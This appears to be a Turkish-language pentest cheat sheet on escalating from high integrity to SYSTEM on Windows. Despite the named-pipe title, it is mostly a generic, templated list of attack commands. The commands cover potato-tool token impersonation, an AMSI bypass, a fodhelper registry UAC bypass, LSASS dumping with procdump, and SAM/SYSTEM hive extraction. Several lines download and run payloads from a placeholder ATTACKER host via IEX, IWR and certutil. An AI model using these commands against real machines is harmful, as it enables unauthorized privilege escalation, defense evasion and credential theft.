Skip to content

From High Integrity to SYSTEM with Name Pipes

windows privesc

From High Integrity to SYSTEM with Name Pipes Windows privesc, credential veya yanal hareket notudur. Token/servis/DLL/AD yüzeyini haritalayıp SYSTEM veya domain etkisi doğrula.

  1. whoami /all, priv, UAC bütünlüğü ve AV durumunu kilitle.

  2. From High Integrity to SYSTEM with Name Pipes için servis/DLL/token/AD hipotezini enum ile destekle.

  3. Yükseltme veya lateral PoC’yi çalıştırıp etkiyi kanıtla.

  4. LSASS/SAM/DPAPI veya domain loot paketle.

From High Integrity to SYSTEM with Name Pipes Windows saldırı notudur. Önce token, bütünlük seviyesi, AV ve yerel grup haritasını çıkar.

Terminal window
whoami /all
Terminal window
systeminfo
Terminal window
whoami /priv
Terminal window
net user; net localgroup administrators
Terminal window
hostname & ipconfig /all
Terminal window
Get-LocalGroupMember Administrators -ErrorAction SilentlyContinue
Terminal window
Get-MpComputerStatus | Select AMServiceEnabled,RealTimeProtectionEnabled
Terminal window
netstat -ano
Terminal window
Get-Service | ? Status -eq Running | Select Name,DisplayName

SeImpersonatePrivilege varsa potato ailesi veya pipe impersonation ile SYSTEM hedeflenir.

Terminal window
whoami /priv
Terminal window
whoami /groups
Terminal window
[System.Security.Principal.WindowsIdentity]::GetCurrent() | fl
Terminal window
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\temp\out.txt" -t *
Terminal window
JuicyPotatoNG.exe -t * -p C:\Windows\System32\cmd.exe -a "/c whoami"
Terminal window
PrintSpoofer.exe -i -c cmd
Terminal window
GodPotato.exe -cmd "cmd /c whoami"
Terminal window
RoguePotato.exe -l ATTACKER -c "C:\Windows\System32\cmd.exe" -a "/c whoami"

Medium→High UAC bypass ve AMSI/ETW kaçışı execution zincirinin parçasıdır.

Terminal window
whoami /groups | findstr Level
Terminal window
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Terminal window
[Environment]::OSVersion.Version
Terminal window
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Terminal window
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/a.ps1')
Terminal window
fodhelper.exe # HKCU ms-settings\shell\open\command
Terminal window
eventvwr.exe
Terminal window
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\temp\evil.exe" /f
Terminal window
winPEASx64.exe quiet
Terminal window
accesschk.exe /accepteula -uwcqv users *
Terminal window
Import-Module .\PowerUp.ps1; Invoke-AllChecks
Terminal window
Get-ChildItem C:\ -Recurse -Include *.xml,*.config,*.ini -ErrorAction SilentlyContinue | Select-String -Pattern 'password|pwd|connectionstring' | Select -First 30
Terminal window
dir C:\Users\Administrator\Desktop
Terminal window
dir C:\Users\*\Documents,C:\Users\*\Desktop -ErrorAction SilentlyContinue
Terminal window
Get-ChildItem -Force C:\ -Include *.kdbx,*.pfx,*.key -Recurse -ErrorAction SilentlyContinue | Select -First 30
Terminal window
procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp
Terminal window
reg save HKLM\SAM C:\temp\sam.save & reg save HKLM\SYSTEM C:\temp\sys.save
Terminal window
# From High Integrity to SYSTEM with Name Pipes — varyant 8
Terminal window
Get-ChildItem C:\Users -Force | Format-Table Name,Mode
Terminal window
Get-ScheduledTask | ? State -eq Ready | Select TaskName,TaskPath
Terminal window
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\* | ? ImagePath -match ' ' | Select PSChildName,ImagePath
Terminal window
findstr /si password *.xml *.ini *.txt *.config 2>$null | Select -First 20
Terminal window
Get-Acl C:\ProgramData | Format-List
Terminal window
qwinsta; quser
Terminal window
wmic product get name,version
Terminal window
dir /a C:\ProgramData\Microsoft\Windows\Start\ Menu\Programs\Startup
Terminal window
cmdkey /list
Terminal window
IWR -Uri http://ATTACKER/a.exe -OutFile C:\Users\Public\a.exe
Terminal window
certutil -urlcache -split -f http://ATTACKER/a.exe C:\Users\Public\a.exe
Terminal window
Start-Process C:\Users\Public\a.exe
[ ] whoami /priv ve gruplar alındı
[ ] Servis/DLL/registry/token yüzeyi tarandı
[ ] Privesc veya lateral PoC doğrulandı
[ ] Credential dump / loot paketlendi
[ ] Sonraki pivot not edildi

From High Integrity to SYSTEM with Name Pipes sonuçları sürüm, yapılandırma ve koruma katmanına göre değişir. Komutları hedefe göre uyarla; başarılı zinciri adım adım kaydet.